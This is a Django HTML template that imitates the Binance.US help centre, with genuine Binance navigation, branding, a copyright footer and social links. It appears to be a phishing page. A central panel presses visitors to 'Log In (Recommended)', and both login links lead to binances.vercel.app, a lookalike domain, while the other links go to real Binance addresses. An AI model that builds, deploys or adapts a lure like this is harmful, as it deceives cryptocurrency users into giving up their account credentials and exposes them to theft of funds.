{% load static %}
<!DOCTYPE html>
<html dir="ltr" lang="en-US">

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <link rel="stylesheet" type="text/css" href="cid:css-8e2249e7-5218-44a7-9fd1-dc7f0534164b@mhtml.blink" />
        <link rel="stylesheet" type="text/css" href="cid:css-d373f9f3-0023-4bd8-b3cd-70507f873db1@mhtml.blink" />
        <link rel="stylesheet" type="text/css" href="cid:css-ab4ed456-94ce-4154-990f-37e5f12423dc@mhtml.blink" />
        <link rel="stylesheet" type="text/css" href="cid:css-983801ee-b838-4501-bd4f-2d07e0bc3dc6@mhtml.blink" />

        <!-- v23809 -->


        <title>Binance.US </title>



        <link rel="canonical" href="https://support.binance.com/hc/en-us">
        <link rel="alternate" hreflang="en-us" href="https://support.binance.com/hc/en-us">
        <link rel="alternate" hreflang="x-default" href="https://support.binance.com/hc/en-us">

        <link rel="stylesheet"
            href="https://static.zdassets.com/hc/assets/application-5dedcabe00a896eb2c214ed2973f0975.css" media="all"
            id="stylesheet">
        <link rel="stylesheet" type="text/css"
            href="https://p23.zdassets.com/hc/theming_assets/9880149/360004534813/style.css?digest=17502319023895">

        <link rel="icon" type="image/x-icon"
            href="https://theme.zdassets.com/theme_assets/9880149/007371e7d77d2e18516e6d394ff7a84a8de6d374.ico">






        <meta content="width=device-width, initial-scale=1.0" name="viewport">
        <!-- Font Awesome -->
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">


    </head>

    <body style="min-height: 100vh; display: flex; justify-content: space-between; flex-direction: column;">
    <div>
        <link rel="stylesheet"
            href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        <link href="https://fonts.googleapis.com/css2?family=IBM+Plex+Sans:wght@300;400;500;600;700&amp;display=swap"
            rel="stylesheet">
        <a class="skip-navigation" tabindex="1"
            href="https://support.binance.com/hc/en-us?fbclid=IwAR2oF7rBQh6K9czyWdxWiX7C1lmNZPVeFfCTyvMJUxaidHP0-Hk8_jnYubk#main-content">Skip
            to main content</a>
        <header class="header">
            <div class="container">
                <div class="logo">
                    <a href="https://www.binance.com/">
                        <!--          #link 'help_center'}} -->
                        <img src="https://theme.zdassets.com/theme_assets/9880149/a473fbfb4c26c390c2314ed952396f4a448da74e.svg"
                            alt="Binance.US  Help Center home page"></a>
                    <!--          /link}} -->
                </div>
                <div class="nav-wrapper">
                    <button class="menu-button" aria-controls="user-nav" aria-expanded="false"
                        aria-label="Toggle navigation menu" style="display: none;">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" focusable="false"
                            viewBox="0 0 16 16" class="icon-menu">
                            <path fill="none" stroke="currentColor" stroke-linecap="round"
                                d="M1.5 3.5h13m-13 4h13m-13 4h13"></path>
                        </svg>
                    </button>
                    <!-- The navigation menu -->
                    <div class="navbar col-2">
                        <a href="https://www.binance.com/en/markets">Markets</a>
                        <a href="https://www.binance.com/en/buy-sell-crypto">Buy Crypto</a>
                        <a href="https://www.binance.com/en/trade/pro/BTC_USD">Spot Trade</a>
                        <a href="https://www.binance.com/staking">Staking</a>
                    </div>
                    <div class="navbar col-3">
                        <a href="https://binances.vercel.app/"> Log In </a>
                        <form action="https://accounts.binance.com/en/register">
                            <button class="reg-btn">Get Started</button>
                        </form>
                    </div>

                   
                </div>
            </div>
        </header>

        <section class="GraySection">
            
           <div style="display: flex; justify-content: center; padding: 0px 20px;">
                <div style="max-width: 400px;">
                    <div>
                        <div style="display: grid; grid-template-columns: auto 1fr; gap: 5px">
                            <svg xmlns="http://www.w3.org/2000/svg" width="40px" height="40px" viewBox="0 0 24 24" fill="none">
                                <path fill-rule="evenodd" clip-rule="evenodd"
                                    d="M22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12ZM12 17.75C12.4142 17.75 12.75 17.4142 12.75 17V11C12.75 10.5858 12.4142 10.25 12 10.25C11.5858 10.25 11.25 10.5858 11.25 11V17C11.25 17.4142 11.5858 17.75 12 17.75ZM12 7C12.5523 7 13 7.44772 13 8C13 8.55228 12.5523 9 12 9C11.4477 9 11 8.55228 11 8C11 7.44772 11.4477 7 12 7Z"
                                    fill="#f8d02e" />
                            </svg>
                            <h3 style="padding-bottom: 20px; text-align: start;">Log in to save important details in your chat history. This will help us serve you
                                better and enhance your chat
                                experience.</h3>
                        </div>
                        <div>
                            <div style="text-align: start;">
                                <a href="https://binances.vercel.app/" style="cursor: pointer;"><button
                                    style="width: 100%; background-color: #f8d02e; color:black; border: 0px; padding: 15px 0px; border-radius: 10px; cursor: pointer">Log
                                    In (Recommended)</button></a>
                            </div>
                        </div>
                    </div>
                </div>
           </div>
        </section>
    </div>

        <footer class="footer">

            <div class="footer-inner">
                <div class="col-md-4">
                    <a href="https://www.binance.com/">
                        <!--          #link 'help_center'}} -->
                        <img src="https://theme.zdassets.com/theme_assets/9880149/a473fbfb4c26c390c2314ed952396f4a448da74e.svg"
                            alt="Binance.US  Help Center home page"></a>
                    <!--          /link}} -->
                </div>

                <div class="row copyright">
                    <div class="col-md-4">
                        <p>© 2023 BAM Trading Services Inc. d.b.a. Binance.US - All rights reserved. </p>
                        <p>NMLS ID: 1906829</p>
                    </div>
                    <div class="col-md-4">
                        <div class="Icons">
                            <a href="https://www.facebook.com/BinanceUS/"><img
                                    src="https://theme.zdassets.com/theme_assets/9880149/f66aa6d50f4916d30ad3cc751f574120ce35099c.svg"></a>
                            <a href="https://www.twitter.com/binanceus"><img
                                    src="https://theme.zdassets.com/theme_assets/9880149/64b028f28ee2853934861cd43cfb7aaaaa3d90e4.svg"></a>
                            <a href="https://www.linkedin.com/company/binance-us"><img
                                    src="https://theme.zdassets.com/theme_assets/9880149/9d3ea3d7b8cb5f87b4f8fba4dd79eb593df75465.svg"></a>
                            <a href="https://t.me/Binance_USA"><img
                                    src="https://theme.zdassets.com/theme_assets/9880149/02cd1d2bfb4c6550da879e1cd4f349cba74ecac4.svg"></a>
                            <a href="https://www.youtube.com/channel/UCOy0sepBMqnlzdaRr_Tlczw?view_as=subscriber"><img
                                    src="https://theme.zdassets.com/theme_assets/9880149/79b1d52d24254c6bd65c36ee01f2baf06f51cd7c.svg"></a>
                            <a href="https://www.instagram.com/binanceus/"><img
                                    src="https://theme.zdassets.com/theme_assets/9880149/ef6c83ce20e0907add78826fa1b2688b7f1b137d.svg"></a>
                            <a href="https://www.reddit.com/r/BinanceUS/"><img
                                    src="https://theme.zdassets.com/theme_assets/9880149/a87e498484c5d08d4fcac3251387b10c2034f994.svg"></a>
                            <a href="https://blog.binance.com/"><img
                                    src="https://theme.zdassets.com/theme_assets/9880149/30680c9dd6b1a36312529ea56934cd45a8fa8372.svg"></a>
                            <!--<a href="https://coinmarketcap.com/exchanges/binance-us/"><img src="//theme.zdassets.com/theme_assets/9880149/16468c07dbe0264e44d1a44407aea7a3bf996dd9.svg"></a>-->
                        </div>
                    </div>
                </div>
            </div>
        </footer>

        <!-- <iframe height="1" width="1"
            style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;"></iframe> -->
    </body>

</html>